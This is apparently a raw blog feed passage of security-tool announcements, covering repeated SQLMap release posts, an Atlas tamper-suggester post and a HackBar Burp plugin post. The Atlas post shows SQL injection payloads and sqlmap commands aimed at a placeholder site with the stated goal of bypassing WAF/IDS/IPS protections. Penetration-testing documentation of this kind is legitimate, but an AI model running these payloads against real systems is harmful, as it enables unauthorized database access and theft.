<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md" rel="nofollow" target="_blank">Indonesian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md" rel="nofollow" target="_blank">Italian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md" rel="nofollow" target="_blank">Japanese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md" rel="nofollow" target="_blank">Portuguese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md" rel="nofollow" target="_blank">Spanish</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md" rel="nofollow" target="_blank">Turkish</a></li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Download SQLMap v1.2.11</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-83448413053718274052018-10-16T09:43:00.000-03:002018-10-16T09:43:10.762-03:00SQLMap v1.2.10 - Automatic SQL Injection And Database Takeover Tool<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-qtuN6e4E00w/W8UvYRg_-dI/AAAAAAAAM6k/JWBtb_29xZcBGvhnqpMLLSUTJ2L_e8drgCLcBGAs/s1600/sqlmap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="612" data-original-width="968" height="404" src="https://4.bp.blogspot.com/-qtuN6e4E00w/W8UvYRg_-dI/AAAAAAAAM6k/JWBtb_29xZcBGvhnqpMLLSUTJ2L_e8drgCLcBGAs/s640/sqlmap.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: justify;">
<b>SQLMap</b> is an open source <a href="http://www.kitploit.com/search/label/Penetration%20Testing%20Tool">penetration testing tool</a> that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful <a href="http://www.kitploit.com/search/label/Detection">detection</a> engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.</div>
<a name='more'></a><br />
<div style="text-align: justify;">
<b><span style="font-size: large;">Features</span></b></div>
<ul>
<li style="text-align: justify;">Full support for <strong>MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix</strong> database management systems.</li>
<li style="text-align: justify;">Full support for six SQL injection techniques: <strong>boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band</strong>.</li>
<li style="text-align: justify;">Support to <strong>directly connect to the database</strong> without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.</li>
<li style="text-align: justify;">Support to enumerate <strong>users, password hashes, privileges, roles, databases, tables and columns</strong>.</li>
<li style="text-align: justify;">Automatic recognition of password hash formats and support for <strong>cracking them using a dictionary-based attack</strong>.</li>
<li style="text-align: justify;">Support to <strong>dump database tables</strong> entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.</li>
<li style="text-align: justify;">Support to <strong>search for specific database names, specific tables across all databases or specific columns across all databases' tables</strong>. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.</li>
<li style="text-align: justify;">Support to <strong>download and upload any file</strong> from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support to <strong>execute arbitrary commands and retrieve their standard output</strong> on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support to <strong>establish an out-of-band stateful TCP connection between the attacker machine and the database server</strong> underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.</li>
<li style="text-align: justify;">Support for <strong>database process' user privilege escalation</strong> via Metasploit's Meterpreter <code>getsystem</code> command.</li>
</ul>
<br />
<span style="font-size: large;"><b>Installation</b></span><br />
You can download the latest tarball by clicking <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">here</a> or latest zipball by clicking <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">here</a>.<br />
Preferably, you can download sqlmap by cloning the <a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Git</a> repository:<br />
<pre><code>git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev</code></pre>
sqlmap works out of the box with <a href="http://www.python.org/download/" rel="nofollow" target="_blank">Python</a> version <strong>2.6.x</strong> and <strong>2.7.x</strong> on any platform.<br />
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
To get a list of basic options and switches use:<br />
<pre><code>python sqlmap.py -h</code></pre>
To get a list of all options and switches use:<br />
<pre><code>python sqlmap.py -hh</code></pre>
You can find a sample run <a href="https://asciinema.org/a/46601" rel="nofollow" target="_blank">here</a>. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the <a href="https://github.com/sqlmapproject/sqlmap/wiki/Usage" rel="nofollow" target="_blank">user's manual</a>.<br />
<br />
<b><span style="font-size: large;">Demo</span></b><br />
<div style="text-align: center;">
<script async="" id="asciicast-46601" src="https://asciinema.org/a/46601.js"></script>
</div>
<br />
<span style="font-size: large;"><b>Links</b></span><br />
<ul>
<li>Homepage: <a href="http://sqlmap.org/" rel="nofollow" target="_blank">http://sqlmap.org</a></li>
<li>Download: <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">.tar.gz</a> or <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">.zip</a></li>
<li>Commits RSS feed: <a href="https://github.com/sqlmapproject/sqlmap/commits/master.atom" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/commits/master.atom</a></li>
<li>Issue tracker: <a href="https://github.com/sqlmapproject/sqlmap/issues" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/issues</a></li>
<li>User's manual: <a href="https://github.com/sqlmapproject/sqlmap/wiki" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki</a></li>
<li>Frequently Asked Questions (FAQ): <a href="https://github.com/sqlmapproject/sqlmap/wiki/FAQ" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/FAQ</a></li>
<li>Twitter: <a href="https://twitter.com/sqlmap" rel="nofollow" target="_blank">@sqlmap</a></li>
<li>Demos: <a href="http://www.youtube.com/user/inquisb/videos" rel="nofollow" target="_blank">http://www.youtube.com/user/inquisb/videos</a></li>
<li>Screenshots: <a href="https://github.com/sqlmapproject/sqlmap/wiki/Screenshots" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/Screenshots</a></li>
</ul>
<br />
<span style="font-size: large;"><b>Translations</b></span><br />
<ul>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md" rel="nofollow" target="_blank">Bulgarian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md" rel="nofollow" target="_blank">Chinese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md" rel="nofollow" target="_blank">Croatian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md" rel="nofollow" target="_blank">French</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md" rel="nofollow" target="_blank">Greek</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md" rel="nofollow" target="_blank">Indonesian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md" rel="nofollow" target="_blank">Italian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md" rel="nofollow" target="_blank">Japanese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md" rel="nofollow" target="_blank">Portuguese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md" rel="nofollow" target="_blank">Spanish</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md" rel="nofollow" target="_blank">Turkish</a></li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Download SQLMap v1.2.10</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-50681576457675444502018-10-07T10:12:00.000-03:002018-10-07T10:12:21.557-03:00Atlas - Quick SQLMap Tamper Suggester<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-pleGGZ3mCD0/W7ktKaxedII/AAAAAAAAMuc/t8hAqm3E_GgzI8-WJqT-C1ZZwWZMp01YgCLcBGAs/s1600/Atlas_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="1368" height="224" src="https://3.bp.blogspot.com/-pleGGZ3mCD0/W7ktKaxedII/AAAAAAAAMuc/t8hAqm3E_GgzI8-WJqT-C1ZZwWZMp01YgCLcBGAs/s640/Atlas_1.png" width="640" /></a></div>
<br />
<strong>Atlas</strong> is an open source tool that can suggest sqlmap tampers to bypass WAF/IDS/IPS, the tool is based on returned status code.<br />
<a name='more'></a><br />
<span style="font-size: large;"><b>Screen</b></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-eRr-nbpW3lY/W7ktO8fpIaI/AAAAAAAAMug/4z48m9R8Ys8HqQUSElRN2wlbScwUmy7PwCLcBGAs/s1600/Atlas_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="747" data-original-width="1600" height="298" src="https://3.bp.blogspot.com/-eRr-nbpW3lY/W7ktO8fpIaI/AAAAAAAAMug/4z48m9R8Ys8HqQUSElRN2wlbScwUmy7PwCLcBGAs/s640/Atlas_2.png" width="640" /></a></div>
<br />
<br />
<span style="font-size: large;"><b>Installation</b></span><br />
<pre><code>$ git clone https://github.com/m4ll0k/Atlas.git atlas
$ cd atlas
$ python atlas.py</code></pre>
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
<pre><code>$ python atlas.py --url http://site.com/index.php?id=Price_ASC --payload="-1234 AND 4321=4321-- AAAA" --dbms=mysql --random-agent -v</code></pre>
<br />
<span style="font-size: large;"><b>Example</b></span><br />
<ol>
<li>Run SQLMap:</li>
</ol>
<pre><code>$ python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3</code></pre>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-HYQCb0cTXXg/W7ktTzXrjGI/AAAAAAAAMuk/5I8n9PSHlO4ukSpp1bEF98bycnN6lZQaQCLcBGAs/s1600/Atlas_3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="123" data-original-width="1182" height="66" src="https://2.bp.blogspot.com/-HYQCb0cTXXg/W7ktTzXrjGI/AAAAAAAAMuk/5I8n9PSHlO4ukSpp1bEF98bycnN6lZQaQCLcBGAs/s640/Atlas_3.png" width="640" /></a></div>
<br />
<code>Price_ASC') AND 8716=4837 AND ('yajr'='yajr</code> is blocked by WAF/IDS/IPS, now trying with Atlas:<br />
<pre><code>$ python atlas.py --url 'http://site.com/index.php?id=Price_ASC' --payload="') AND 8716=4837 AND ('yajr'='yajr" --random-agent -v</code></pre>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-Qlfby5I5dd4/W7ktXtqYo1I/AAAAAAAAMuo/7Qxc-qVG77E12N7Q8GaahebgFyFbdyYywCLcBGAs/s1600/Atlas_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="185" data-original-width="1464" height="80" src="https://4.bp.blogspot.com/-Qlfby5I5dd4/W7ktXtqYo1I/AAAAAAAAMuo/7Qxc-qVG77E12N7Q8GaahebgFyFbdyYywCLcBGAs/s640/Atlas_4.png" width="640" /></a></div>
<br />
At this point:<br />
<pre><code>$ python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3 --tamper=versionedkeywords,...</code></pre>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/m4ll0k/Atlas" rel="nofollow" target="_blank">Download Atlas</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-38280915639035424242018-09-22T18:07:00.000-03:002018-09-22T18:07:02.597-03:00HackBar - HackBar Plugin For Burpsuite<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-kM_rGQ-AZdI/W6XTCYe7jgI/AAAAAAAAMjE/WV0ozGAOnDcEhBYaR1jExi5teCfMdpfYgCLcBGAs/s1600/HackBar_4.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="665" data-original-width="882" height="482" src="https://3.bp.blogspot.com/-kM_rGQ-AZdI/W6XTCYe7jgI/AAAAAAAAMjE/WV0ozGAOnDcEhBYaR1jExi5teCfMdpfYgCLcBGAs/s640/HackBar_4.gif" width="640" /></a></div>
<br />
HackBar - HackBar Plugin For Burpsuite V1.0.<br />
<br />
<span style="font-size: large;"><b>Requirements</b></span><br />
<ul>
<li>Burpsuite</li>
<li>Java</li>
</ul>
<a name='more'></a><br />
<span style="font-size: large;"><b>How to Install</b></span><br />
<pre><code>Download Jar 'https://github.com/d3vilbug/HackBar/releases/tag/1.0' and add in burpsuite</code></pre>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-H7Dgxjxe_dw/W6XTPAF57QI/AAAAAAAAMjI/A0wF23n-WikC4Zb-oC0USZjQ_wLAplU1QCLcBGAs/s1600/HackBar_5.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="665" data-original-width="1321" height="322" src="https://2.bp.blogspot.com/-H7Dgxjxe_dw/W6XTPAF57QI/AAAAAAAAMjI/A0wF23n-WikC4Zb-oC0USZjQ_wLAplU1QCLcBGAs/s640/HackBar_5.gif" width="640" /></a></div>
<br />
<span style="font-size: large;"><b>Tested on</b></span><br />
<ul>
<li>Burpsuite 1.7.36</li>
<li>Windows 10</li>
<li>xubuntu 18.04</li>
</ul>
<br />
<span style="font-size: large;"><b>Upcoming Features/Modules</b></span><br />
<ul>
<li>Ctrl + H (shortcut)</li>
<li>WAF bypass (SQLi)</li>
<li>Decoder/Encoder</li>
<li>Simulate Attack (Automatically test complete cheat sheet with one click)</li>
</ul>
<br />
<span style="font-size: large;"><b>Greets</b></span><br />
<ul>
<li>An0n 3xPloiTeR <a href="https://github.com/Anon-Exploiter/" rel="nofollow" target="_blank">https://github.com/Anon-Exploiter/</a> for <a href="http://www.kitploit.com/search/label/SQLi">SQLi</a> && <a href="http://www.kitploit.com/search/label/XSS">XSS</a> payloads</li>
<li>PayloadsAllTheThings <a href="https://github.com/swisskyrepo/PayloadsAllTheThings/" rel="nofollow" target="_blank">https://github.com/swisskyrepo/PayloadsAllTheThings/</a></li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/d3vilbug/HackBar" rel="nofollow" target="_blank">Download HackBar</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-2890895112694490392018-09-07T09:57:00.000-03:002018-09-07T09:57:03.721-03:00SQLMap v1.2.9 - Automatic SQL Injection And Database Takeover Tool<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-ix3AwQ23UAg/W5IGbus4orI/AAAAAAAAMbM/0XMrDbZEpPs7gw3jPzYQ7zG8ZTpw5fPFQCLcBGAs/s1600/sqlmap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="534" data-original-width="677" height="504" src="https://1.bp.blogspot.com/-ix3AwQ23UAg/W5IGbus4orI/AAAAAAAAMbM/0XMrDbZEpPs7gw3jPzYQ7zG8ZTpw5fPFQCLcBGAs/s640/sqlmap.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: justify;">
<b>SQLMap</b> is an open source <a href="http://www.kitploit.com/search/label/Penetration%20Testing%20Tool">penetration testing tool</a> that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful <a href="http://www.kitploit.com/search/label/Detection">detection</a> engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.</div>
<a name='more'></a><br />
<div style="text-align: justify;">
<b><span style="font-size: large;">Features</span></b></div>
<ul>
<li style="text-align: justify;">Full support for <strong>MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix</strong> database management systems.</li>
<li style="text-align: justify;">Full support for six SQL injection techniques: <strong>boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band</strong>.</li>
<li style="text-align: justify;">Support to <strong>directly connect to the database</strong> without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.</li>
<li style="text-align: justify;">Support to enumerate <strong>users, password hashes, privileges, roles, databases, tables and columns</strong>.</li>
<li style="text-align: justify;">Automatic recognition of password hash formats and support for <strong>cracking them using a dictionary-based attack</strong>.</li>
<li style="text-align: justify;">Support to <strong>dump database tables</strong> entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.</li>
<li style="text-align: justify;">Support to <strong>search for specific database names, specific tables across all databases or specific columns across all databases' tables</strong>. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.</li>
<li style="text-align: justify;">Support to <strong>download and upload any file</strong> from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support to <strong>execute arbitrary commands and retrieve their standard output</strong> on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support to <strong>establish an out-of-band stateful TCP connection between the attacker machine and the database server</strong> underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.</li>
<li style="text-align: justify;">Support for <strong>database process' user privilege escalation</strong> via Metasploit's Meterpreter <code>getsystem</code> command.</li>
</ul>
<br />
<span style="font-size: large;"><b>Installation</b></span><br />
You can download the latest tarball by clicking <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">here</a> or latest zipball by clicking <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">here</a>.<br />
Preferably, you can download sqlmap by cloning the <a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Git</a> repository:<br />
<pre><code>git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev</code></pre>
sqlmap works out of the box with <a href="http://www.python.org/download/" rel="nofollow" target="_blank">Python</a> version <strong>2.6.x</strong> and <strong>2.7.x</strong> on any platform.<br />
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
To get a list of basic options and switches use:<br />
<pre><code>python sqlmap.py -h</code></pre>
To get a list of all options and switches use:<br />
<pre><code>python sqlmap.py -hh</code></pre>
You can find a sample run <a href="https://asciinema.org/a/46601" rel="nofollow" target="_blank">here</a>. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the <a href="https://github.com/sqlmapproject/sqlmap/wiki/Usage" rel="nofollow" target="_blank">user's manual</a>.<br />
<br />
<b><span style="font-size: large;">Demo</span></b><br />
<div style="text-align: center;">
<script async="" id="asciicast-46601" src="https://asciinema.org/a/46601.js"></script>
</div>
<br />
<span style="font-size: large;"><b>Links</b></span><br />
<ul>
<li>Homepage: <a href="http://sqlmap.org/" rel="nofollow" target="_blank">http://sqlmap.org</a></li>
<li>Download: <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">.tar.gz</a> or <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">.zip</a></li>
<li>Commits RSS feed: <a href="https://github.com/sqlmapproject/sqlmap/commits/master.atom" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/commits/master.atom</a></li>
<li>Issue tracker: <a href="https://github.com/sqlmapproject/sqlmap/issues" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/issues</a></li>
<li>User's manual: <a href="https://github.com/sqlmapproject/sqlmap/wiki" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki</a></li>
<li>Frequently Asked Questions (FAQ): <a href="https://github.com/sqlmapproject/sqlmap/wiki/FAQ" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/FAQ</a></li>
<li>Twitter: <a href="https://twitter.com/sqlmap" rel="nofollow" target="_blank">@sqlmap</a></li>
<li>Demos: <a href="http://www.youtube.com/user/inquisb/videos" rel="nofollow" target="_blank">http://www.youtube.com/user/inquisb/videos</a></li>
<li>Screenshots: <a href="https://github.com/sqlmapproject/sqlmap/wiki/Screenshots" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/Screenshots</a></li>
</ul>
<br />
<span style="font-size: large;"><b>Translations</b></span><br />
<ul>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md" rel="nofollow" target="_blank">Bulgarian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md" rel="nofollow" target="_blank">Chinese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md" rel="nofollow" target="_blank">Croatian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md" rel="nofollow" target="_blank">French</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md" rel="nofollow" target="_blank">Greek</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md" rel="nofollow" target="_blank">Indonesian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md" rel="nofollow" target="_blank">Italian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md" rel="nofollow" target="_blank">Japanese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md" rel="nofollow" target="_blank">Portuguese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md" rel="nofollow" target="_blank">Spanish</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md" rel="nofollow" target="_blank">Turkish</a></li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Download SQLMap v1.2.9</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-68464350557200924802018-08-28T09:33:00.000-03:002018-08-28T09:33:09.819-03:00SQLMap v1.2.8 - Automatic SQL Injection And Database Takeover Tool<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-czqlRY-vLd8/W4TS7P5D1qI/AAAAAAAAMTA/V5yutt2PbsIdmX9NE3MYlO2P_zqKUvagQCLcBGAs/s1600/sqlmap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="643" data-original-width="658" height="624" src="https://4.bp.blogspot.com/-czqlRY-vLd8/W4TS7P5D1qI/AAAAAAAAMTA/V5yutt2PbsIdmX9NE3MYlO2P_zqKUvagQCLcBGAs/s640/sqlmap.png" width="640" /></a></div>
<br />
<div style="text-align: justify;">
<b>SQLMap</b> is an open source <a href="http://www.kitploit.com/search/label/Penetration%20Testing%20Tool">penetration testing tool</a> that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful <a href="http://www.kitploit.com/search/label/Detection">detection</a> engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.</div>
<a name='more'></a><br />
<div style="text-align: justify;">
<b><span style="font-size: large;">Features</span></b></div>
<ul>
<li style="text-align: justify;">Full support for <strong>MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix</strong> database management systems.</li>
<li style="text-align: justify;">Full support for six SQL injection techniques: <strong>boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band</strong>.</li>
<li style="text-align: justify;">Support to <strong>directly connect to the database</strong> without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.</li>
<li style="text-align: justify;">Support to enumerate <strong>users, password hashes, privileges, roles, databases, tables and columns</strong>.</li>
<li style="text-align: justify;">Automatic recognition of password hash formats and support for <strong>cracking them using a dictionary-based attack</strong>.</li>
<li style="text-align: justify;">Support to <strong>dump database tables</strong> entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.</li>
<li style="text-align: justify;">Support to <strong>search for specific database names, specific tables across all databases or specific columns across all databases' tables</strong>. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.</li>
<li style="text-align: justify;">Support to <strong>download and upload any file</strong> from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support to <strong>execute arbitrary commands and retrieve their standard output</strong> on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support to <strong>establish an out-of-band stateful TCP connection between the attacker machine and the database server</strong> underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.</li>
<li style="text-align: justify;">Support for <strong>database process' user privilege escalation</strong> via Metasploit's Meterpreter <code>getsystem</code> command.</li>
</ul>
<br />
<span style="font-size: large;"><b>Installation</b></span><br />
You can download the latest tarball by clicking <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">here</a> or latest zipball by clicking <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">here</a>.<br />
Preferably, you can download sqlmap by cloning the <a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Git</a> repository:<br />
<pre><code>git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev</code></pre>
sqlmap works out of the box with <a href="http://www.python.org/download/" rel="nofollow" target="_blank">Python</a> version <strong>2.6.x</strong> and <strong>2.7.x</strong> on any platform.<br />
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
To get a list of basic options and switches use:<br />
<pre><code>python sqlmap.py -h</code></pre>
To get a list of all options and switches use:<br />
<pre><code>python sqlmap.py -hh</code></pre>
You can find a sample run <a href="https://asciinema.org/a/46601" rel="nofollow" target="_blank">here</a>. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the <a href="https://github.com/sqlmapproject/sqlmap/wiki/Usage" rel="nofollow" target="_blank">user's manual</a>.<br />
<br />
<b><span style="font-size: large;">Demo</span></b><br />
<div style="text-align: center;">
<script src="https://asciinema.org/a/46601.js" id="asciicast-46601" async></script>
</div>
<br />
<span style="font-size: large;"><b>Links</b></span><br />
<ul>
<li>Homepage: <a href="http://sqlmap.org/" rel="nofollow" target="_blank">http://sqlmap.org</a></li>
<li>Download: <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">.tar.gz</a> or <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">.zip</a></li>
<li>Commits RSS feed: <a href="https://github.com/sqlmapproject/sqlmap/commits/master.atom" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/commits/master.atom</a></li>
<li>Issue tracker: <a href="https://github.com/sqlmapproject/sqlmap/issues" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/issues</a></li>
<li>User's manual: <a href="https://github.com/sqlmapproject/sqlmap/wiki" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki</a></li>
<li>Frequently Asked Questions (FAQ): <a href="https://github.com/sqlmapproject/sqlmap/wiki/FAQ" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/FAQ</a></li>
<li>Twitter: <a href="https://twitter.com/sqlmap" rel="nofollow" target="_blank">@sqlmap</a></li>
<li>Demos: <a href="http://www.youtube.com/user/inquisb/videos" rel="nofollow" target="_blank">http://www.youtube.com/user/inquisb/videos</a></li>
<li>Screenshots: <a href="https://github.com/sqlmapproject/sqlmap/wiki/Screenshots" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/Screenshots</a></li>
</ul>
<br />
<span style="font-size: large;"><b>Translations</b></span><br />
<ul>
